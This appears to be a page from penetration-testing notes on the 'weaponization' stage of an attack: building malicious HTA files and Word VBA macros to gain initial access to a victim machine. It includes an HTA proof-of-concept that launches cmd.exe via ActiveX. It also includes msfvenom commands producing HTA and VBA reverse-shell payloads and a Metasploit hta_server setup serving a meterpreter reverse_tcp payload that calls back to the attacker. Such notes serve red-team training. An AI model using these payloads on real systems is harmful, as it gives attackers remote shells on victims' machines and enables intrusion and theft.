Skip to main content

Weaponization

In the Weaponization Stage, the Attacker Generates and Develops their own Malicious Code using deliverable Payloads such as Word Documents, PDFs, etc. The Weaponization Stage aims to use the Malicious Weapon to Exploit the Target Machine and gain Initial Access.


HTML Application (HTA)

HTA allows you to create a Downloadable file that takes all the Information regarding how it is Displayed and Rendered. HTML Applications, also known as HTA's, which are dynamic HTML Pages containing JScript and VBScript. The Tool mshta is used to execute HTA files. It can be executed by Itself or Automatically from Internet Explorer.


This is a Proof of Concept Payload that uses an ActiveXObject to Execute cmd.exe. We can Host this Payload on our Server and once the Victim runs the .hta file the cmd.exe is going to get Invoked.

<Payload_Name>.hta
<html>
<body>
<script>
    var c= 'cmd.exe'
    new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

HTA Reverse Connection

We can use the msfvenom from the Metasploit Framework to generate a Malicious Payload to connect back to the Attacker Machine.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f hta-psh -o <Output>

Malicious HTA via Metasploit

We can Generate and serve malicious HTA files using the Metasploit Framework.

On the Victim Machine, once the Malicious HTA File that was provided as a URL by Metasploit is Visited, we should receive a Reverse Connection.

use exploit/windows/misc/hta_server
set LHOST   <IP>
set LPORT   <PORT>
set SRVHOST <IP>
set payload windows/meterpreter/reverse_tcp
run

Visual Basic for Application (VBA)

VBA is a Programming Language by Microsoft implemented for Microsoft Applications such as Microsoft Word, Excel, PowerPoint, etc. VBA Programming allows Automating Tasks of nearly every Keyboard and Mouse interaction between a User and Microsoft Office Applications.

Macros are Microsoft Office Applications that contain Embedded Code written in a Programming Language known as Visual Basic for Applications (VBA). It is used to create custom functions to speed up manual Tasks by creating automated processes. One of VBA's features is accessing the Windows Application Programming Interface (API) and other Low-Level functionality.


  • Open Microsoft Word:
    • Select Blank Document.
    • Click View.
    • Click Macros and after View Macros.
    • Assign the Macro Name (This is going to be your Function Name).
    • Click Create.
    • Click Edit.

Info

It is Important to Note that to make the Macro work, we need to save it in Macro-Enabled format such as .doc .docm

Info

Microsoft Word might show a Security Message indicating that Macros have been Disabled and give us the option to Enable them.


  • We can run the Macro by pressing F5 or Run - Run Sub/UserForm.
Sub Function_Name()
  MsgBox ("Custom Message!")
End Sub


VBA Reverse Connection

We can use the msfvenom from the Metasploit Framework to generate a Malicious Payload to connect back to the Attacking Machine.

Copy the Output and Save it into the Macro Editor of the Microsoft Word Document.

msfvenom -p windows/x64/shell_reverse_tcpLHOST=<IP> LPORT=<PORT> -f vba